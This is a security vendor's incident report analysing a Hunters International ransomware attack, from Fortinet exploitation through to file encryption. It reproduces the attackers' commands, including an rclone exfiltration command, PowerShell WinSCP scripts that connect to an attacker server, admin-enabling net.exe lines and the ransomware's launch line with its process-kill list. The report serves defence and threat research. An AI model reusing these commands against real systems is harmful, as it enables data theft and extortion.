From Access to Encryption: Dissecting Hunters International's Latest Ransomware Attack

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In February 2025, the eSentire Threat Response Unit (TRU) identified ransomware activity targeting a retail organization attributed to Hunters International, a ransomware group that emerged in mid-2023.

According to open-source reporting, Hunters International purchased ransomware source code from Hive and is likely operating as a standalone group, maintaining their own infrastructure and handling their own targeting and negotiations. Initial access was achieved through the successful exploitation of CVE-2024-55591, an authentication bypass vulnerability affecting FortiOS and FortiProxy.

Threat actors leveraged a VPN to access internal network resources using RDP where they executed various reconnaissance commands, created user accounts, and attempted to exfiltrate data with Rclone before pivoting to WinSCP. After successfully exfiltrating some data, Hunters International Ransomware was deployed to encrypt files.

CVE-2024-55591 Exploitation and Initial Access

Initial access to the environment was achieved via exploitation of CVE-2024-55591 against a vulnerable Fortinet device. This activity was identified in jsconsole and can be seen in the figure below, which shows threat actors adding a new user “my_admin” from 127.0.0.1.

The next log entry shown below displays the newly added user account “my_admin” being used from threat actor IP “195.123.243[.]81”, which resolves to the VPN provider, VPN Jantit.

The threat actor was able to create a super admin account “my_admin” as can be seen in Figure 3, which was subsequently used to create a local user account “svc-fortigate” on the device as can be seen in the figure below.

The “my_admin” account was also leveraged to add a firewall policy to grant the newly created “svc-fortigate” account broad access to internal network resources.

These actions broadly mirror the activity described by Fortinet in their advisory. Following establishment of VPN access, threat actors gained access to a privileged service account which was subsequently used to access an internal domain controller using RDP, followed by typical reconnaissance commands to orient themselves, as seen in the table below.

Threat actors remoted into several other endpoints in the environment and began using RClone/WinSCP for data exfiltration. Looking to exfiltrate files and deploy ransomware as soon as possible, specific arguments were passed to RClone, effectively ignoring files older than 5 years or matching file extensions that are unlikely to store sensitive data. The bandwidth limit was also specified, setting the max bandwidth to 200 MiB/s.

After unsuccessfully exfiltrating data via RClone, threat actors pivoted to using WinSCP.

Following this, several user accounts with names mimicking “Installer” were created:

• InstaIIer (note the use of upper case "i" characters, e.g. “instaiier”.)
• Instailer (note the use of the character "i")

The newly created accounts were then used in enabling/setting a password for the built-in “administrator” account and adding it to the domain.

• "C:\Windows\system32\net.exe" user administrator /active:yes /domain
• "C:\Windows\system32\net.exe" user administrator <REDACTED> /domain

Subsequent analysis showed use of both Rclone and WinSCP tools for data exfiltration. For example, a PowerShell command similar to the one below was observed. This command effectively targets non-executable and media files less than 5 years old and rapidly copies them using multi-threading and concurrent file transfers at 200 MB/s.

rclone.exe copy \SHARE\D$\FOLDER sftp:DOMAIN\SHARE\FOLDER -q --max-age 5y --ignore-existing --auto-confirm --multi-thread-streams 4 --transfers 6 --bwlimit 200M --exclude *.exe --exclude *.msi --exclude *.MSI --exclude *.mp3 --exclude *.MP3 --exclude *.EXE --exclude *.avi --exclude *.mp4 --exclude *.MP4 --exclude *.AVI --exclude *.mov --exclude *.MOV --exclude *.iso --exclude *.ISO --exclude *.VHDX -P

Threat actors also downloaded WinSCP via web browser from the official site (winscp[.]net) and used it for exfiltration. We identified several WinSCP related PowerShell scripts such as the one shown in Figures 6 and 7 below.

At first glance, the scripts appear similar in function to the Rclone command referenced above; however, due to the usage of the “get” command in WinSCP, the scripts effectively attempt to download files and directories present on the compromised host from the threat actor-controlled server, rather than upload files from the compromised host to the threat-actor controlled server.

This suggests threat actors may have generated these scripts using AI tooling.

$winscpPath ="C:\Program Files (x86)\WinSCP\WinSCP.com"
$scriptPath ="$env:TEMP\winscp_script.txt"
$hostname = "192.155.106[.]11"
$remoteRootPath ="/home/*"
$localRootPath ="C:\"
$excludeList =@(
"*.exe", "*.msi", "*.MSI", "*.mp3", "*.MP3", "*.EXE",
"*.avi", "*.mp4", "*.MP4", "*.AVI", "*.mov", "*.MOV",
"*.iso", "*.ISO", "*.VHDX"
)
function Download-Files {
    param (
        [string]$localPath,
        [string]$remotePath
    )
    $excludeArgs =$excludeList |ForEach-Object { "| grep -v `"$_`"" } -join " "
    $scriptContent = @" open sftp://root:<REDACTED_ATTACKER_ROOT_PASSWORD>@$192.155.106.11 lcd `"$localPath`" cd `"$remotePath`" get * $excludeArgs close exit "@
    $scriptContent |Set-Content -Path $scriptPath -Encoding UTF8
    Start-Process -FilePath $winscpPath -ArgumentList "/script=$scriptPath" -NoNewWindow -Wait
}
$allDrives = Get-PSDrive-PSProvider FileSystem |Where-Object { $_.Root -match"^[A-Z]:\\$" }
foreach ($drive in$allDrives) {
    $directories =Get-ChildItem -Path $drive.Root -Recurse -Directory
    foreach ($dir in $directories) {
        Download-Files -localPath $dir.FullName -remotePath "$remoteRootPath/$($dir.Name)"
    }
}   

A variation of the script above was also executed that is similar apart from ignoring the C:\ drive and the usage of WinSCP.exe (GUI), rather than the command line only version used before, i.e. WinSCP.com.

$winscpPath = "C:\Program Files (x86)\WinSCP\WinSCP.exe"
$hostname = "192.155.106[.]11"
$username = "root"
$password = ""
$remoteRootPath = "/home/"
$localRootPath = "C:\"
$excludeList = @(
"*.exe", "*.msi", "*.MSI", "*.mp3", "*.MP3", "*.EXE",
"*.avi", "*.mp4", "*.MP4", "*.AVI", "*.mov", "*.MOV",
"*.iso", "*.ISO", "*.VHDX"
)
$excludeArgs = $excludeList | ForEach-Object { "--exclude=`"$_`"" } | Join-String " "
function Download-Files {
    param (
        [string]$localPath,
        [string]$remotePath
    )
try {
    $script = @" open sftp://${username}:${password}@${hostname}/ get ${remotePath} ${localPath}\* ${excludeArgs} close exit "@
    Start-Process -FilePath $winscpPath -ArgumentList "/script=`"$script`""
} catch { Write-Host "Error: ${remotePath}: $_" }}
$allDrives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -ne "C:\" }
foreach ($drive in $allDrives) {
    $directories = Get-ChildItem -Path $drive.Root -Recurse -Directory
    foreach ($dir in $directories) {
        Download-Files -localPath $dir.FullName -remotePath "$remoteRootPath$dir.Name"
    }
}

Hunters International Ransomware

Following data exfiltration, threat actors attempted to deploy the exe version “encrypter_windows_x64.exe” of the Hunters International Ransomware, however it was detected and quarantined by EDR, causing the group to pivot and deploy the dll version “encrypter_windows_x64.dll” instead.

Upon analyzing the encryption binary “encrypter_windows_x64.dll”, we determined and attributed this incident to Hunters International, which employs a ransomware written in the Rust programming language. Unlike previous variants, this variant does not leave ransom notes, nor does it append a file extension to encrypted files.

The ransomware encryption binary supports several command line arguments, some of which are as follows:

• --admin – Allows the threat actors the ability to run the encryption binary as a specific user.
• -k – Allows specification of a list of processes the ransomware needs to terminate prior to file encryption.

The following command was used to execute the ransomware encryption binary. Note, all of the process names specified after the “-k” argument are the processes the ransomware terminates. This ensures the ransomware is able to acquire a file handle to overwrite files that may otherwise have open handles that would prevent access.

• rundll32.exe C:\Users\User\AppData\Local\Temp\encrypter_windows_x64.dll, Open --admin DOMAIN\Administrator:<ADMIN PASSWORD> -k agntsvc backup dbeng50 dbsnmp encsvc excel firefox infopath isqlplussvc memtas mepocs msaccess msexchange msmq mspub mssql mydesktopqos mydesktopservice mysql notepad ocautoupds ocomm ocssd onenote oracle outlook powerpnt sap sqbcoreservice sql steam svc$ synctime tbirdconfig thebat thunderbird veeam visio vmm vmms vmwp vss winword wordpad xfssvccon

The ransomware uses multiple threads to encrypt files, where each encryption of a file involves the generation of a buffer containing a 32 byte key (offset 0) and 16 byte initial counter value (offset 0x36) for AES-256 CTR encryption. The buffer is generated via BCryptRandom (size 0x1FE) at offset 0x53C0.

The 32 byte (256 bit) key and expanded round keys are passed via rcx and the 16 byte initial counter is passed through rdx (pointer to pointer).

Each byte of the plaintext is XORed with the corresponding byte from the keystream to produce the ciphertext.

The following python code proves the assertion that AES-256 CTR is used, which can be tested by breaking on the AES-256 CTR routine at offset 0x3F44 and capturing/replacing the AES key and initial counter within the code below.

from Crypto.Util import Counter
from Crypto.Cipher import AES
from itertools import cycle


# Replace me with the first 16 bytes passed via the second argument's first pointer
COUNTER = b'\x4E\x7A\x94\xEA\x61\xDA\xE3\x18\x8B\x6B\x2A\xCE\xD5\x0E\xA4\x09'

# Replace me with the first 32 bytes passed via the first argument
AES_KEY = b'\xCE\x52\x1C\x6F\xD4\xF9\x30\xFA\xC2\x2F\xDA\x66\x19\x35\x95\x9D\x16\x05\xE2\x3E\xF0\x27\x06\xB9\x6A\xD1\x89\xCB\xB5\x43\x44\x5A'

# Replace me with the plaintext you want to cipher
PLAIN_TEXT = b'Super Secret'

def xor_data(data, key):
    return bytes(c ^ k for c, k in zip(data, cycle(key)))

def main():
    # Generate the keystream
    initial_value=int.from_bytes(COUNTER, byteorder='little')
    ctr = Counter.new(128, initial_value=initial_value, little_endian=True)
    cipher = AES.new(AES_KEY, AES.MODE_CTR, counter=ctr)
    keystream = cipher.encrypt(b'\x00' * 128)

    print(f"Keystream: {keystream.hex()}")

    # XOR each byte of the keystream with each byte of the plaintext
    # to produce the ciphertext
    ciphertext = xor_data(PLAIN_TEXT, keystream)
    print(f"Ciphertext: {ciphertext.hex()}")

if __name__ == "__main__":
    main()

The figure below is an illustration of the entropy before and after encryption of a test file. Note, the left-hand side of the illustration is the test file and the right-hand side is the file after encryption and displays how chunks of the file are unchanged while others are encrypted.

The ransomware makes use of Service Control Manager (SCM) APIs to stop the VSS (Volume Shadow Copy Service) Service.

Processes are terminated through the CreateToolHelp32Snapshot/Process32First/Process32Next Windows APIs.

The ransomware makes use of the ShellExecuteA Windows API to execute several Live-off-the-Land Binaries (LOLBins) to disable/delete volume shadow copies. Associated LOLBin and command line arguments can be seen in the table below.

As noted earlier, an admin account username and password can be provided to the ransomware via command line arguments. If provided, the ransomware uses the LogonUserW and ImpersonateLoggedOnUser Windows APIs to login to the account and impersonate its security context.

The file encryption process begins with enumerating files/directories via the FindFirstFileW/FindNextFileW Windows APIs. Files are read via calls to CreateFileW, NtReadFile, and SetFilePointerEx. The list below contains the directories, files, and file extensions that are skipped (not encrypted).

Directories

• $recycle.bin
• boot
• system volume information
• temp
• thumb
• tmp
• trend micro
• windows
• winnt

Files

• autorun.inf
• bootfont.bin
• boot.ini
• bootsect.bak
• desktop.ini
• iconcache.db
• ntldr
• ntuser.dat
• ntuser.dat.log
• ntuser.ini.log
• thumbs.dbi.log

File Extensions

• dll, exe, lnk, msi, sys, 4dd, 4dl, accdb, accdc, accde, accdr, accdt, accft, adb, ade, adf, adp, arc, ora, alf, ask, btr, bdf, cat, cdb, ckp, cma, cpd, dacpac, dad, dadiagrams, daschema, db, db-shm, db-wal, db3, dbc, dbf, dbs, dbt, dbv, dbx, dcb, dct, dcx, ddl, dlis, dp1, dqy, dsk, dsn, dtsx, dxl, eco, ecx, edb, epim, exb, fcd, fdb, fic, fmp, fmp12, fmpsl, fol, fp3, fp4, fp5, fp7, fpt, frm, gdb, grdb, gwi, hdb, his, ib, idb, ihx, itdb, itw, jet, jtx, kdb, kexi, kexic, kexis, lgc, lwx, maf, maq, mar, mas, mav, mdb, mdf, mpd, mrg, mud, mwb, myd, ndf, nnt, nrmlib, ns2, ns3, ns4, nsf, nv, nv2, nwdb, nyf, odb, oqy, orx, owc, p96, p97, pan, pdb, pdm, pnz, qry, qvd, rbf, rctd, rod, rodx, rpd, rsd, sas7bdat, sbf, scx, sdb, sdc, sdf, sis, spq, sql, sqlite, sqlite3, sqlitedb, te, temx, tmd, tps, trc, trm, udb, udl, usr, v12, vis, vpd, vvv, wdb, wmdb, wrk, xdb, xld, xmlff, abcddb, abs, abx, accdw, adn, db2, fm5, hjt, icg, icr, kdb, lut, maw, mdn, mdt, vdi, vhd, pvm, vmem, vmsn, vmsd, nvram, vmx, raw, qcow2, subvol, bin, vsv, avhd, vmrs, vhdx, avdx, vmcx, iso, vmdk

Extortion Site

Hunters International uses the double extortion tactic to pressure victims into paying the ransomware, otherwise exfiltrated files are leaked on their dark-web leak site. The figure below illustrates the breach site, highlighting that 263 organizations have been affected so far.

What did we do?

• Upon identifying the intrusion, the SOC Incident Handling team was able to perform in-depth analysis to uncover the attacker’s tactics, techniques and procedures (TTPs).
• We notified the customer of the incident and assisted with remediation efforts.

What can you learn from this TRU Positive? 

• Hunters International is a financially motivated group that employs double extortion tactics and delivered ransomware following the exploitation of FortiOS vulnerability CVE-2024-55591.
• Exploits for edge devices are highly sought after by ransomware actors as a means for both network access and evading EDR during early-stage activity.
• Take action to limit access to administrative interfaces on such devices, and patch critical vulnerabilities promptly.
• File transfer tools like RClone continue to be prevalent for data exfiltration purposes, enabling threat actors to transfer large amounts of sensitive data to threat actor-controlled servers.

Recommendations from the Threat Response Unit (TRU): 

• Keep critical systems up-to-date with security patches and conduct regular vulnerability assessments to identify potential security gaps.
• Monitor for and restrict access to Living-off-the-Land Binaries (LOLBins).
• Monitor for suspicious RDP connections and unauthorized admin account creation.
• Watch for unusual data transfer patterns, especially large outbound transfers.
• Track the installation and use of file transfer tools like RClone and WinSCP.
• Use a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.

Indicators of Compromise

• Indicators of Compromise can be found here.

References

• https://fortiguard.fortinet.com/psirt/FG-IR-24-535
• https://nvd.nist.gov/vuln/detail/cve-2024-55591
• https://www.bleepingcomputer.com/news/security/new-hunters-international-ransomware-possible-rebrand-of-hive/